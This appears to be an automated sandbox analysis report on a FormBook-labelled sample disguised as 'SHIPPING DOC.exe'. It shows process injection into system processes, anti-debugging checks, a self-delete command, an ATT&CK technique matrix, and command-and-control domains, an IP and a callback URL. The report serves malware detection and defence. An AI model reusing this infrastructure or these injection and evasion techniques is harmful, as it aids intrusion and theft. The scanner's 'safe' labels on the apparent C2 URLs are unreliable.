          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FA9D3 mov eax, dword ptr fs:[00000030h]6_2_036FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A0 mov eax, dword ptr fs:[00000030h]6_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036309AD mov eax, dword ptr fs:[00000030h]6_2_036309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036309AD mov eax, dword ptr fs:[00000030h]6_2_036309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B89B3 mov esi, dword ptr fs:[00000030h]6_2_036B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B89B3 mov eax, dword ptr fs:[00000030h]6_2_036B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B89B3 mov eax, dword ptr fs:[00000030h]6_2_036B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BE872 mov eax, dword ptr fs:[00000030h]6_2_036BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BE872 mov eax, dword ptr fs:[00000030h]6_2_036BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C6870 mov eax, dword ptr fs:[00000030h]6_2_036C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C6870 mov eax, dword ptr fs:[00000030h]6_2_036C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03642840 mov ecx, dword ptr fs:[00000030h]6_2_03642840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03660854 mov eax, dword ptr fs:[00000030h]6_2_03660854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03634859 mov eax, dword ptr fs:[00000030h]6_2_03634859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03634859 mov eax, dword ptr fs:[00000030h]6_2_03634859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03652835 mov eax, dword ptr fs:[00000030h]6_2_03652835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03652835 mov eax, dword ptr fs:[00000030h]6_2_03652835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03652835 mov eax, dword ptr fs:[00000030h]6_2_03652835
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_00C41AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00C41AC3

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 50.28.1.56 80Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 4056Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 4056Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 4056Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: C40000Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: A9F008Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
          Source: SHIPPING DOC.exe, explorer.exe, 00000008.00000002.3705526362.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.3079123622.0000000009021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3714018507.0000000009022000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.3705526362.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1275870172.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.3705526362.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1275870172.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
          Source: explorer.exe, 00000008.00000002.3704102761.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1275436502.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
          Source: explorer.exe, 00000008.00000002.3705526362.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1275870172.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: SHIPPING DOC.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: SHIPPING DOC.exeBinary or memory string: WIN_XP
          Source: SHIPPING DOC.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
          Source: SHIPPING DOC.exeBinary or memory string: WIN_XPe
          Source: SHIPPING DOC.exeBinary or memory string: WIN_VISTA
          Source: SHIPPING DOC.exeBinary or memory string: WIN_7
          Source: SHIPPING DOC.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          1
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          21
          Input Capture
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules
          2
          Valid Accounts
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol21
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts
          2
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares3
          Clipboard Data
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation
          1
          DLL Side-Loading
          NTDS25
          System Information Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection
          2
          Valid Accounts
          LSA Secrets241
          Security Software Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Virtualization/Sandbox Evasion
          Cached Domain Credentials2
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
          Access Token Manipulation
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
          Process Injection
          Proc Filesystem11
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549885 Sample: SHIPPING DOC.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 26 www.onsfskfsmpfssfpewqdsawqe.xyz 2->26 28 www.ivglass.xyz 2->28 30 12 other IPs or domains 2->30 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 7 other signatures 2->52 10 SHIPPING DOC.exe 1 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 28->50 process4 signatures5 54 Writes to foreign memory regions 10->54 56 Maps a DLL or memory area into another process 10->56 13 svchost.exe 10->13         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 13->58 60 Maps a DLL or memory area into another process 13->60 62 Sample uses process hollowing technique 13->62 64 3 other signatures 13->64 16 colorcpl.exe 13->16         started        19 explorer.exe 63 1 13->19 injected process8 dnsIp9 34 Modifies the context of a thread in another process (thread injection) 16->34 36 Maps a DLL or memory area into another process 16->36 38 Tries to detect virtualization through RDTSC time measurements 16->38 40 Switches to a custom stack to bypass stack traces 16->40 22 cmd.exe 1 16->22         started        32 croom.net 50.28.1.56, 49971, 80 LIQUIDWEBUS United States 19->32 42 System process connects to network (likely due to code injection or exploit) 19->42 signatures10 process11 process12 24 conhost.exe 22->24         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SHIPPING DOC.exe53%VirustotalBrowse
          SHIPPING DOC.exe45%ReversingLabsWin32.Backdoor.FormBook
          SHIPPING DOC.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          croom.net1%VirustotalBrowse
          www.epehr.pics0%VirustotalBrowse
          www.hemicans.xyz0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.ivglass.xyzReferer:0%Avira URL Cloudsafe
          http://www.estwestcottwines.shop/ge07/www.rowadservepros.net0%Avira URL Cloudsafe
          http://www.hemicans.xyz/ge07/0%Avira URL Cloudsafe
          http://www.croom.net/ge07/www.ngeribe2.homes0%Avira URL Cloudsafe
          http://www.eries-htii.xyz/ge07/0%Avira URL Cloudsafe
          http://www.onsfskfsmpfssfpewqdsawqe.xyz/ge07/www.g18q11a.top0%Avira URL Cloudsafe
          http://www.ehkd.top/ge07/0%Avira URL Cloudsafe
          http://www.croom.net/ge07/0%Avira URL Cloudsafe
          http://www.ivglass.xyz/ge07/0%Avira URL Cloudsafe
          http://www.ehkd.top/ge07/www.hemicans.xyz0%Avira URL Cloudsafe
          http://www.xhyx.top/ge07/0%Avira URL Cloudsafe
          http://www.isit-txax.xyz/ge07/0%Avira URL Cloudsafe
          http://www.epehr.pics0%Avira URL Cloudsafe
          http://www.xhyx.topReferer:0%Avira URL Cloudsafe
          http://www.rowadservepros.net0%Avira URL Cloudsafe
          http://www.isit-txax.xyz0%Avira URL Cloudsafe
          http://www.hemicans.xyzReferer:0%Avira URL Cloudsafe
          http://www.xhyx.top0%Avira URL Cloudsafe
          http://www.hemicans.xyz0%Avira URL Cloudsafe
          http://www.ngeribe2.homes0%Avira URL Cloudsafe
          http://www.isit-txax.xyzReferer:0%Avira URL Cloudsafe
          http://www.ehkd.top0%Avira URL Cloudsafe
          http://www.ngeribe2.homes/ge07/www.epehr.pics0%Avira URL Cloudsafe
          http://www.g18q11a.top/ge07/0%Avira URL Cloudsafe
          http://www.estwestcottwines.shop0%Avira URL Cloudsafe
          http://www.croom.netReferer:0%Avira URL Cloudsafe
          http://www.onsfskfsmpfssfpewqdsawqe.xyz/ge07/0%Avira URL Cloudsafe
          http://www.epehr.pics/ge07/www.amyard.shop0%Avira URL Cloudsafe
          http://www.amyard.shop/ge07/0%Avira URL Cloudsafe
          http://www.croom.net0%Avira URL Cloudsafe
          http://www.isit-txax.xyz/ge07/www.9net88.net0%Avira URL Cloudsafe
          http://www.giyztm.xyz/ge07/www.xhyx.top0%Avira URL Cloudsafe
          http://www.g18q11a.top/ge07/www.ehkd.top0%Avira URL Cloudsafe
          http://www.g18q11a.topReferer:0%Avira URL Cloudsafe
          http://www.estwestcottwines.shopReferer:0%Avira URL Cloudsafe
          http://www.amyard.shopReferer:0%Avira URL Cloudsafe
          http://www.onsfskfsmpfssfpewqdsawqe.xyzReferer:0%Avira URL Cloudsafe
          http://www.amyard.shop0%Avira URL Cloudsafe
          http://www.rowadservepros.net/ge07/0%Avira URL Cloudsafe
          http://www.eries-htii.xyzReferer:0%Avira URL Cloudsafe
          http://www.ehkd.topReferer:0%Avira URL Cloudsafe
          http://www.g18q11a.top0%Avira URL Cloudsafe
          http://www.hemicans.xyz/ge07/www.croom.net0%Avira URL Cloudsafe
          http://www.eries-htii.xyz/ge07/www.isit-txax.xyz0%Avira URL Cloudsafe
          http://www.eries-htii.xyz0%Avira URL Cloudsafe
          http://www.9net88.net/ge07/www.estwestcottwines.shop0%Avira URL Cloudsafe
          http://www.ngeribe2.homes/ge07/0%Avira URL Cloudsafe
          http://www.epehr.pics/ge07/0%Avira URL Cloudsafe
          http://www.ivglass.xyz/ge07/www.eries-htii.xyz0%Avira URL Cloudsafe
          http://www.onsfskfsmpfssfpewqdsawqe.xyz0%Avira URL Cloudsafe
          http://www.croom.net/ge07/?KzrXZd=RnhvF69Eejdjh7LW/vVnUSwJbe8jMECevaaVozv0Nv6leJNRl1tdFOKkXLktzsH0v2W+gs0fFA==&n0G=AdhDQXr0%Avira URL Cloudsafe
          http://www.rowadservepros.net/ge07/www.giyztm.xyz0%Avira URL Cloudsafe
          http://www.amyard.shop/ge07/www.ivglass.xyz0%Avira URL Cloudsafe
          http://www.rowadservepros.netReferer:0%Avira URL Cloudsafe
          http://www.estwestcottwines.shop/ge07/0%Avira URL Cloudsafe
          http://www.epehr.picsReferer:0%Avira URL Cloudsafe
          http://www.ngeribe2.homesReferer:0%Avira URL Cloudsafe
          http://www.ivglass.xyz0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          94950.bodis.com
          199.59.243.227
          truefalse
            high
            croom.net
            50.28.1.56
            truetrueunknown
            www.epehr.pics
            unknown
            unknowntrueunknown
            www.hemicans.xyz
            unknown
            unknowntrueunknown
            www.ehkd.top
            unknown
            unknowntrue
              unknown
              www.g18q11a.top
              unknown
              unknowntrue
                unknown
                www.croom.net
                unknown
                unknowntrue
                  unknown
                  www.isit-txax.xyz
                  unknown
                  unknowntrue
                    unknown
                    www.ngeribe2.homes
                    unknown
                    unknowntrue
                      unknown
                      www.9net88.net
                      unknown
                      unknowntrue
                        unknown
                        www.amyard.shop
                        unknown
                        unknowntrue
                          unknown
                          www.onsfskfsmpfssfpewqdsawqe.xyz
                          unknown
                          unknowntrue
                            unknown
                            www.ivglass.xyz
                            unknown
                            unknowntrue
                              unknown
                              www.eries-htii.xyz
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                www.9net88.net/ge07/false
                                  high
                                  http://www.croom.net/ge07/?KzrXZd=RnhvF69Eejdjh7LW/vVnUSwJbe8jMECevaaVozv0Nv6leJNRl1tdFOKkXLktzsH0v2W+gs0fFA==&n0G=AdhDQXrtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 00000008.00000000.1277736211.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://www.ehkd.top/ge07/www.hemicans.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
